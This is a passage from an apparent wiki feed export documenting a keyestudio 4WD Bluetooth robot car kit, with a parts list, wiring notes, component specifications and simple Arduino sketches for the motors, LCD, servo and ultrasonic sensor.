    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;1&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;I2C 1602 LCD&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;1&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;keyestudio Line Tracking Sensor&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;3&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;HC-SR04 Ultrasonic Sensor&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;1&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;keyestudio Digital IR Receiver Module&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;1&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;4WD Top PCB&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;1&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;4WD Bottom PCB&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;1&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;Servo Motor&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;1&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;Servo Plastic Platform&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;1&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;IR Remote Control&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;1&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;Toggle Switch + Wire&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;1&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;18650 Battery Holder&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;1&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;DC Motor&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;4&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;Motor Fixed Part&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;4&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;Plastic Tire&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;4&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;Copper Pillar 40MM&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;6&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;Copper Pillar 10MM&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;16&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;USB Cable&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;1&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;Jumper Wire&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;30&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;M3*6MM Round Head Screw&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;60&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;M3*8MM Flat Head Screw&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;2&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;M3*30MM Round Head Screw&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;8&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;3MM Nut&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;16&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;Connector Wire (150mm, Black)&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;6&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;Connector Wire (150mm, Red)&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;6&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;Winding Wire (12CM)&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;1&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Assembly ==&lt;br /&gt;
&lt;br /&gt;
Follow the User Manual. If something is unclear then watch a assembly video. Be careful when installing the motors, make sure they’re all properly aligned, if not the car will pull to one side.&lt;br /&gt;
Especially take care that no cables sticks into the motors.&lt;br /&gt;
&lt;br /&gt;
== Motor control ==&lt;br /&gt;
We control the motor using a H-Bridge L298N Motor Driver. Use a exxternal 5V logic supply when using more than 12V driving voltage.&lt;br /&gt;
&lt;br /&gt;
[[File:Motor_Driver.png|500px]]&lt;br /&gt;
&lt;br /&gt;
In our case we need to plug two motors to each motorA and motorB. Connect the power from the battery pack VSS and GND.&lt;br /&gt;
&lt;br /&gt;
[[File:Motor_Driver_schematics.png|500px]]&lt;br /&gt;
&lt;br /&gt;
Wire the motor to the Arduino/Sensor Shield as adviced in the user manual.&lt;br /&gt;
&lt;br /&gt;
=== Specification: ===&lt;br /&gt;
* Working Mode: H bridge (double lines)&lt;br /&gt;
* Control Chip: L298N (ST)&lt;br /&gt;
* Logical Voltage: 5V&lt;br /&gt;
* Driving Voltage: 5V-35V&lt;br /&gt;
* Logical Current: 0mA-36mA&amp;gt;&lt;br /&gt;
* Driving Current: 2A (MAX single bridge)&lt;br /&gt;
* Storage Temperature: (-20 °C)-(+135 °C)&lt;br /&gt;
* Maximum Power: 25W&lt;br /&gt;
* Weight: 30g&lt;br /&gt;
* Periphery Dimension: 43 x 43 x 27 mm(L x W x H)&lt;br /&gt;
&lt;br /&gt;
=== Code ===&lt;br /&gt;
==== Initiation ====&lt;br /&gt;
 //define the output pins.&lt;br /&gt;
 int IN1=5;&lt;br /&gt;
 int IN2=6;&lt;br /&gt;
 int IN3=7;&lt;br /&gt;
 int IN4=8;&lt;br /&gt;
 int ENA=9;&lt;br /&gt;
 int ENB=10;&lt;br /&gt;
 void setup() {&lt;br /&gt;
   //set up the pins to act as output.&lt;br /&gt;
   for (int i = 5; i &amp;lt; 11;i++)&lt;br /&gt;
   {&lt;br /&gt;
     pinMode(i,OUTPUT);&lt;br /&gt;
   }&lt;br /&gt;
   delay(5000);&lt;br /&gt;
 }&lt;br /&gt;
==== Rotate Clockwise ====  &lt;br /&gt;
&lt;br /&gt;
 void turnClockwise()&lt;br /&gt;
 {&lt;br /&gt;
  analogWrite(ENA,0);&lt;br /&gt;
  analogWrite(ENB,0);&lt;br /&gt;
  digitalWrite(IN1,LOW);&lt;br /&gt;
  digitalWrite(IN2,HIGH);&lt;br /&gt;
 &lt;br /&gt;
  digitalWrite(IN3,LOW);&lt;br /&gt;
  digitalWrite(IN4,HIGH);&lt;br /&gt;
  delay(150);&lt;br /&gt;
  analogWrite(ENA,200);&lt;br /&gt;
  analogWrite(ENB,200);&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
==== Rotate Counter Clockwise ==== &lt;br /&gt;
 void turnCounterClockwise()&lt;br /&gt;
 {&lt;br /&gt;
  analogWrite(ENA,0);&lt;br /&gt;
  analogWrite(ENB,0);&lt;br /&gt;
  digitalWrite(IN1,HIGH);&lt;br /&gt;
  digitalWrite(IN2,LOW);&lt;br /&gt;
 &lt;br /&gt;
  digitalWrite(IN3,HIGH);&lt;br /&gt;
  digitalWrite(IN4,LOW);&lt;br /&gt;
  delay(150);&lt;br /&gt;
  analogWrite(ENA,200);&lt;br /&gt;
  analogWrite(ENB,200);&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
==== Drive Forward ====&lt;br /&gt;
&lt;br /&gt;
 void driveForward()&lt;br /&gt;
 {&lt;br /&gt;
  analogWrite(ENA,0);&lt;br /&gt;
  analogWrite(ENB,0);&lt;br /&gt;
  digitalWrite(IN1,LOW);&lt;br /&gt;
  digitalWrite(IN2,HIGH);&lt;br /&gt;
 &lt;br /&gt;
  digitalWrite(IN3,HIGH);&lt;br /&gt;
  digitalWrite(IN4,LOW);&lt;br /&gt;
  delay(150);&lt;br /&gt;
  analogWrite(ENA,100);&lt;br /&gt;
  analogWrite(ENB,100);&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
==== Drive Reverse ====&lt;br /&gt;
&lt;br /&gt;
 void driveReverse()&lt;br /&gt;
 {&lt;br /&gt;
  analogWrite(ENA,0);&lt;br /&gt;
  analogWrite(ENB,0);&lt;br /&gt;
  digitalWrite(IN1,HIGH);&lt;br /&gt;
  digitalWrite(IN2,LOW);&lt;br /&gt;
  &lt;br /&gt;
  digitalWrite(IN3,LOW);&lt;br /&gt;
  digitalWrite(IN4,HIGH);&lt;br /&gt;
  delay(150);&lt;br /&gt;
  analogWrite(ENA,100);&lt;br /&gt;
  analogWrite(ENB,100);&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
==== Brake ====&lt;br /&gt;
 void brake()&lt;br /&gt;
 {&lt;br /&gt;
  analogWrite(ENA,0);&lt;br /&gt;
  analogWrite(ENB,0);&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
== I2C Display ==&lt;br /&gt;
The display is controlled with I2C. I am using the Wire and LiquidCrystal_I2C library to control the display.&lt;br /&gt;
&lt;br /&gt;
=== Specification ===&lt;br /&gt;
&lt;br /&gt;
* I2C Address: 0x27&lt;br /&gt;
* Back Lit (Blue with white char color)&lt;br /&gt;
* Supply Voltage: 5V&lt;br /&gt;
* Interface:I2C/TWI x1,Gadgeteer interface x2&lt;br /&gt;
* Adjustable Contrast&lt;br /&gt;
* Size:82x35x18 mm&lt;br /&gt;
&lt;br /&gt;
=== Schematics ===&lt;br /&gt;
[[File:I2C_Display_Schematics.png|800px]]&lt;br /&gt;
=== Code ===&lt;br /&gt;
&amp;lt;div style=&amp;quot;border: 1px solid #31708f; background-color: #d9edf7; color: #31708f; padding: 5px 10px; margin-bottom: 5px; text-align: justify&amp;quot;&amp;gt;&amp;lt;b&amp;gt;Note&amp;lt;/b&amp;gt;: Don&#039;t use the library link that is in the manual, it contains a bug where only the first character of the strings is displayed on the I2C display. Download the latest version from https://www.arduinolibraries.info/libraries/liquid-crystal-i2-c.&lt;br /&gt;
&amp;lt;/div&amp;gt; &lt;br /&gt;
 #include &amp;lt;Wire.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;LiquidCrystal_I2C.h&amp;gt;&lt;br /&gt;
 //set the LCD address to 0x27 for a 16 chars and 2 line display&lt;br /&gt;
 LiquidCrystal_I2C lcd(0x27,16,2);&lt;br /&gt;
 void setup()&lt;br /&gt;
 {&lt;br /&gt;
  //initialize the lcd&lt;br /&gt;
  lcd.init();&lt;br /&gt;
  //enable the backlight &lt;br /&gt;
  lcd.backlight();&lt;br /&gt;
  //set the cursor to the first line.&lt;br /&gt;
  lcd.setCursor(3,0);&lt;br /&gt;
  //print text&lt;br /&gt;
  lcd.print(&amp;quot;Hello&amp;quot;);&lt;br /&gt;
  //set the cursor in the next line.&lt;br /&gt;
  lcd.setCursor(3,1);&lt;br /&gt;
  //print text&lt;br /&gt;
  lcd.print(&amp;quot;world!&amp;quot;);&lt;br /&gt;
 }&lt;br /&gt;
 &lt;br /&gt;
 void loop()&lt;br /&gt;
 {}&lt;br /&gt;
&lt;br /&gt;
== Servo Motor ==&lt;br /&gt;
The Servo Motor is controlled with PWM. The Sketch rotates the motor in an angle between 110 and 180 degres.&lt;br /&gt;
&lt;br /&gt;
=== Schematics ===&lt;br /&gt;
[[File:Servo_Motor_Schematics.png|400px]]&lt;br /&gt;
&lt;br /&gt;
=== Code ===&lt;br /&gt;
&lt;br /&gt;
 int servopin=2;// select digital pin 9 for servomotor signal line&lt;br /&gt;
 int myangle;// initialize angle variable&lt;br /&gt;
 int pulsewidth;// initialize width variable&lt;br /&gt;
 int val;&lt;br /&gt;
 &lt;br /&gt;
 void servopulse(int servopin,int myangle)// define a servo pulse function&lt;br /&gt;
 {&lt;br /&gt;
   pulsewidth=(myangle*11)+500;// convert angle to 500-2480 pulse width&lt;br /&gt;
   digitalWrite(servopin,HIGH);// set the level of servo pin as “high”&lt;br /&gt;
   delayMicroseconds(pulsewidth);// delay microsecond of pulse width&lt;br /&gt;
   digitalWrite(servopin,LOW);// set the level of servo pin as “low”&lt;br /&gt;
   delay(20-pulsewidth/1000);&lt;br /&gt;
 }&lt;br /&gt;
 &lt;br /&gt;
 void setup()&lt;br /&gt;
 {&lt;br /&gt;
   pinMode(servopin,OUTPUT);// set servo pin as “output”&lt;br /&gt;
   Serial.begin(9600);// connect to serial port, set baud rate at “9600”&lt;br /&gt;
   Serial.println(&amp;quot;ready&amp;quot; ) ;&lt;br /&gt;
 }&lt;br /&gt;
 &lt;br /&gt;
 void loop(){&lt;br /&gt;
   val = 180;&lt;br /&gt;
   Serial.print(&amp;quot;moving servo to &amp;quot;);&lt;br /&gt;
   Serial.print(val);&lt;br /&gt;
   Serial.println();&lt;br /&gt;
   for(int i=0;i&amp;lt;=25;i++) // giving the servo time to rotate to commanded position&lt;br /&gt;
   {&lt;br /&gt;
     servopulse(servopin,val);// use the pulse function&lt;br /&gt;
   }&lt;br /&gt;
   val = 110;&lt;br /&gt;
   Serial.print(&amp;quot;moving servo to &amp;quot;);&lt;br /&gt;
   Serial.print(val);&lt;br /&gt;
   Serial.println();&lt;br /&gt;
   for(int i=0;i&amp;lt;=25;i++) // giving the servo time to rotate to commanded position&lt;br /&gt;
   {&lt;br /&gt;
     servopulse(servopin,val);// use the pulse function&lt;br /&gt;
   }&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
== Ultra Sonic Sensor ==&lt;br /&gt;
I used the pins: echoPin 3 and trigPin 4 because 7 and 8 is already taken by the motordriver.&lt;br /&gt;
If you don&#039;t understand the line: distance = duration/58.3;.&lt;br /&gt;
The speed of sound is 343 m/s. We messure the round trip so we need to divide the 343 with 2 which gives us 171.5 m/s. But we don’t want to deal with meters and seconds we want centimeters and microseconds. 17150 cm/s = 0.017150 cm/us = 1cm/58.3 us.&lt;br /&gt;
&lt;br /&gt;
=== Specification ===&lt;br /&gt;
* Working Voltage: DC 5V&lt;br /&gt;
* Working Current: 15mA&lt;br /&gt;
* Working Frequency: 40Hz&lt;br /&gt;
* Max Range: 4m&lt;br /&gt;
* Min Range: 2cm&lt;br /&gt;
* Measuring Angle: 15 degree&lt;br /&gt;
* Trigger Input Signal: 10µS TTL pulse&lt;br /&gt;
* Echo Output Signal Input TTL lever signal and the range in proportion&lt;br /&gt;
* Size: 46*20.4mm&lt;br /&gt;
* Weight: 9g&lt;br /&gt;
&lt;br /&gt;
=== Schematics ===&lt;br /&gt;
[[File:Ultra_Sonic_Schematics.png|650px]]&lt;br /&gt;
&lt;br /&gt;
=== Code ===&lt;br /&gt;
&lt;br /&gt;
 #define echoPin 7 // Echo Pin&lt;br /&gt;
 #define trigPin 8 // Trigger Pin&lt;br /&gt;
 #define LEDPin 13 // Onboard LED&lt;br /&gt;
 &lt;br /&gt;
 int maximumRange = 200; // Maximum range needed&lt;br /&gt;
 int minimumRange = 0; // Minimum range needed&lt;br /&gt;
 long duration, distance; // Duration used to calculate distance&lt;br /&gt;
 &lt;br /&gt;
 void setup() {&lt;br /&gt;
  Serial.begin (9600);&lt;br /&gt;
  pinMode(trigPin, OUTPUT);&lt;br /&gt;
  pinMode(echoPin, INPUT);&lt;br /&gt;
  pinMode(LEDPin, OUTPUT); // Use LED indicator (if required)&lt;br /&gt;
 }&lt;br /&gt;
 &lt;br /&gt;
 void loop() {&lt;br /&gt;
 /* The following trigPin/echoPin cycle is used to determine the&lt;br /&gt;
  distance of the nearest object by bouncing soundwaves off of it. */ &lt;br /&gt;
  digitalWrite(trigPin, LOW); &lt;br /&gt;
  delayMicroseconds(2); &lt;br /&gt;
 &lt;br /&gt;
  digitalWrite(trigPin, HIGH);&lt;br /&gt;
  delayMicroseconds(10); &lt;br /&gt;
  digitalWrite(trigPin, LOW);&lt;br /&gt;
  duration = pulseIn(echoPin, HIGH);&lt;br /&gt;
  &lt;br /&gt;
  //Calculate the distance (in cm) based on the speed of sound.&lt;br /&gt;
  distance = duration/58.3;&lt;br /&gt;
 &lt;br /&gt;
  if (distance &amp;gt;= maximumRange || distance &amp;lt;= minimumRange){&lt;br /&gt;
   /* Send a negative number to computer and Turn LED ON &lt;br /&gt;
   to indicate &amp;quot;out of range&amp;quot; */&lt;br /&gt;
   Serial.println(&amp;quot;-1&amp;quot;);&lt;br /&gt;
   digitalWrite(LEDPin, HIGH); &lt;br /&gt;
  }&lt;br /&gt;
  else {&lt;br /&gt;
   /* Send the distance to the computer using Serial protocol, and&lt;br /&gt;
   turn LED OFF to indicate successful reading. */&lt;br /&gt;
   Serial.println(distance);&lt;br /&gt;
   digitalWrite(LEDPin, LOW); &lt;br /&gt;
  } &lt;br /&gt;
  //Delay 50ms before next reading.&lt;br /&gt;
  delay(50);&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
== Line Tracking Sensor ==&lt;br /&gt;
&lt;br /&gt;
=== Specification ===&lt;br /&gt;
* Power Supply: +5V&lt;br /&gt;
* Operating Current: &amp;lt;10mA&lt;br /&gt;
* Operating Temperature Range: 0°C ~ + 50°C&lt;br /&gt;
* Output Interface: 3-wire interface (1 - signal, 2 - power, 3 - power supply negative)&lt;br /&gt;
* Output Level: TTL level&lt;br /&gt;
&lt;br /&gt;
=== Schematics ===&lt;br /&gt;
[[File:Line_Tracking_Sensor_Schematics.png|600px]]&lt;br /&gt;
=== Code ===&lt;br /&gt;
&lt;br /&gt;
== Digital IR Receiver Module ==&lt;br /&gt;
=== Specification ===&lt;br /&gt;
* Power Supply: 5V&lt;br /&gt;
* Interface: Digital&lt;br /&gt;
* Modulate Frequency: 38kHz&lt;br /&gt;
* Module Interface Socket: JST PH2.0&lt;br /&gt;
&lt;br /&gt;
=== Schematics ===&lt;br /&gt;
[[File:IR_Receiver_Schematics.png|600px]]&lt;br /&gt;
=== Code ===&lt;br /&gt;
&lt;br /&gt;
== Bluetooth Module ==&lt;br /&gt;
=== Specification ===&lt;br /&gt;
* Bluetooth Protocol: Bluetooth 2.1+ EDR Standard&lt;br /&gt;
* USB Protocol: USB v1.1/2.0&lt;br /&gt;
* Operating Frequency: 2.4GHz ISM Frequency Band&lt;br /&gt;
* Modulation Mode: Gauss Frequency Shift Keying&lt;br /&gt;
* Transmit Power: ≤ 4dBm, Second Stage&lt;br /&gt;
* Sensitivity: ≤-84dBm at 0.1% Bit Error Rate&lt;br /&gt;
* Transmission Speed: 2.1Mbps(Max)/160 kbps(Asynchronous)； 1Mbps/1Mbps(Synchronous)&lt;br /&gt;
* Safety Feature: Authentication and Encryption&lt;br /&gt;
* Supported Configuration: Bluetooth Serial Port (major and minor)&lt;br /&gt;
* Supply Voltage: 5V DC 50mA &lt;br /&gt;
* Operating Temperature: -20 to 55℃&lt;br /&gt;
=== Schematics ===&lt;br /&gt;
[[File:Bluetooth_Module_Schematics.png|600px]]&lt;br /&gt;
=== Code ===&lt;br /&gt;
== Used Hardware ==&lt;br /&gt;
&lt;br /&gt;
[[Smart Robot Car Kit Bluetooth 4WD keyestudio]]&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://wiki.keyestudio.com/Ks0192_keyestudio_4WD_Bluetooth_Multi-functional_Car&lt;br /&gt;
* https://www.youtube.com/watch?v=GAqvzCXEUSw&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>Bnagl</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=File:Bluetooth_Module_Schematics.png&amp;diff=5995</id>
		<title>File:Bluetooth Module Schematics.png</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=File:Bluetooth_Module_Schematics.png&amp;diff=5995"/>
		<updated>2021-02-12T15:35:23Z</updated>

		<summary type="html">&lt;p&gt;Bnagl: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Bnagl</name></author>
	</entry>
</feed>